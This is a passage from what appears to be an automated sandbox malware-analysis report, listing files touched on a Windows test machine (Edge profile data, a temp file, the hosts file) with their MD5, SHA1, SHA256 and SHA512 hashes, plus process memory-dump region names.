| SHA512 | bf3f92f5023f0fbad88526d919252a98db6d167e9ca3e15b94f7d71ded38a2cfb0409f57ef24708284ddd965bda2d3207cd99c008b1c9c8c93705fd66ac86360 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments\2025.1.17.1\keys.json
| MD5 | bef4f9f856321c6dccb47a61f605e823 |
| SHA1 | 8e60af5b17ed70db0505d7e1647a8bc9f7612939 |
| SHA256 | fd1847df25032c4eef34e045ba0333f9bd3cb38c14344f1c01b48f61f0cfd5c5 |
| SHA512 | bdec3e243a6f39bfea4130c85b162ea00a4974c6057cd06a05348ac54517201bbf595fcc7c22a4ab2c16212c6009f58df7445c40c82722ab4fa1c8d49d39755c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 8c3c0bac75e554258163ee2199555cb6 |
| SHA1 | 31bd166d5adeb4fa8685cb485ef98a7c5e5796eb |
| SHA256 | 2b12a750e028a3a56768ade33f4ddbd34196437ac67194de1ff5f67244f43b18 |
| SHA512 | a3076b75a290e0a0813920c04b24bdbe07bc76ac98bf757828ac000d9b1f6222b6c1dc14cbe5bc9a5ec7213f8f6f2b0b89cce1d529628a2979f55d0aa48254db |
C:\Users\Admin\AppData\Local\Temp\autC82D.tmp
| MD5 | ec0f9398d8017767f86a4d0e74225506 |
| SHA1 | 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36 |
| SHA256 | 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375 |
| SHA512 | d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484 |
memory/3472-1534-0x0000000000740000-0x000000000082C000-memory.dmp
memory/3472-1537-0x0000000000740000-0x000000000082C000-memory.dmp
memory/2776-1551-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1972-1581-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/4952-1582-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/5840-1632-0x0000000000400000-0x000000000056F000-memory.dmp
memory/1224-1634-0x0000000000400000-0x000000000056F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | b331a1b46356fc73201a0212552ed7d2 |
| SHA1 | 2487e6146e3db0881248029104020f92af855ab5 |
| SHA256 | 143f509fe0861ab103b5312d78fc7dda156624fab3cf390e8c63705f139ef1b9 |
| SHA512 | 41d28c6952bffef8545c44b85cfec38081036e5d1527fde00d49d34181dd649d1303e6d1ea027b603065b223a1518295bed9af7813583f7522516d391af21905 |
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2492_1395074356\manifest.json
| MD5 | 22b68a088a69906d96dc6d47246880d2 |
| SHA1 | 06491f3fd9c4903ac64980f8d655b79082545f82 |
| SHA256 | 94be212fe6bcf42d4b13fabd22da97d6a7ef8fdf28739989aba90a7cf181ac88 |
| SHA512 | 8c755fdc617fa3a196e048e222a2562622f43362b8ef60c047e540e997153a446a448e55e062b14ed4d0adce7230df643a1bd0b06a702dc1e6f78e2553aadfff |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.3.10\data.txt
| MD5 | 60beb7140ed66301648ef420cbaad02d |
| SHA1 | 7fac669b6758bb7b8e96e92a53569cf4360ab1aa |
| SHA256 | 95276c09f44b28100c0a21c161766eda784a983f019fc471290b1381e7ed9985 |
| SHA512 | 6dfa4eca42aea86fba18bc4a3ab0eed87948ea1831e33d43426b3aca1816070ecb7fd024856ad571ca2734214a98cc55e413502b3deef2c4a101228a7377e9d5 |
memory/2776-1713-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1972-1734-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/4952-1735-0x0000000000400000-0x00000000009B6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 1ae402663239cbefacaba6e2ea795d72 |
| SHA1 | affe356a68712f533d9815293277a2a6d6b8cebd |
| SHA256 | bbb473e82ed3cace51fe2b2806f7fec6057bb0180958f8c63f291fd8be1f1bda |
| SHA512 | 79463e19d545c1b3a434f798e020c09c393bd4deb9aba47b01614b05c89e634cae87bb36fa976c1455d44db2bd41c52b76d05afc3130060a31ed2726bfe51546 |
C:\Windows\System32\drivers\etc\hosts
| MD5 | abf47d44b6b5cd8701fdbd22e6bed243 |
| SHA1 | 777c06411348954e6902d0c894bdac93d59208da |
| SHA256 | 4bc6059764441036962b0c0ec459b8ec4bb78a693a59964d8b79f0dc788a0754 |
| SHA512 | 9dcadf596cc6e5175f48463652f8b7274cd4b69aaf7b9123aa90adc17156868fce86b781c291315a9e5b72c94965242b5796d771b1b12c81d055b39bf305ac77 |
memory/2776-1904-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/4952-1958-0x0000000000400000-0x00000000009B6000-memory.dmp
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2492_874988062\manifest.json
| MD5 | 86095c966115d8fbabfe3e7496461e73 |
| SHA1 | 9f6af2a9e4608c25b5c9257acdf77ba9838abc1d |
| SHA256 | 9313c1c29918e4a75e85b3146647555080286d61517f0ac9c62c1993e274a6a6 |
| SHA512 | 51970ae96e6af2a2dbf086ea25a7ec6912a76954346dc85c885e6fd81128699abb14b368b09dd18c5d34183734fc6cfc8dcf0db03b916cd1dc21af7180653005 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Typosquatting\2025.3.26.1\typosquatting_list.pb
| MD5 | 7c411ccffc2c011ba155c4bae74c9217 |
| SHA1 | 6e0f96399bea0c45b188caf7c11b2549a2bbb551 |
| SHA256 | 71529860ca9874c1b29017b1b4846986d14f51f9f60dcbd8c7af7559cc0e0ac8 |
| SHA512 | cbeba7735948e9565f4d7ee462366693a6915758486c5d7a84a4d6eaf0bcac948f579e91d883e1d6ffa27268acd10db86f02d7f9111837c757349e8cfa8fc0da |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 0018a7947739205575f1411b03833531 |
| SHA1 | 775955bdbeb5df9c75203231c0508791559167f9 |
| SHA256 | 78702731364f9c5cf0f0a5f232821b2f2044296bab8343682e703becd386df92 |
| SHA512 | ec34c4fb88d3406eac9a84c6e255a6f6d11d486fd7b88abaff53f0e3ad6fb0a60288f39d537d8f902220cf9898345c29f9ba2673cce948ca83c4ef264585b890 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 78f97e4caa68d790dfea1c64ad8ae297 |
| SHA1 | a4a7b35e9a2675325c21b2a449be24c8dc0b7d2f |
| SHA256 | dbe7f327e25c4006a6d50ed2802b7dca4cf86856501bb005ade1553ded001b61 |
| SHA512 | f8f9f002d688b54f3a2f612ab242be7132f694e8b10dc335a6ac2faf5a23aa454dc2231739070af7bdd7668d9c76e1159ffba7b67e4732cae025ce067ac7f2f8 |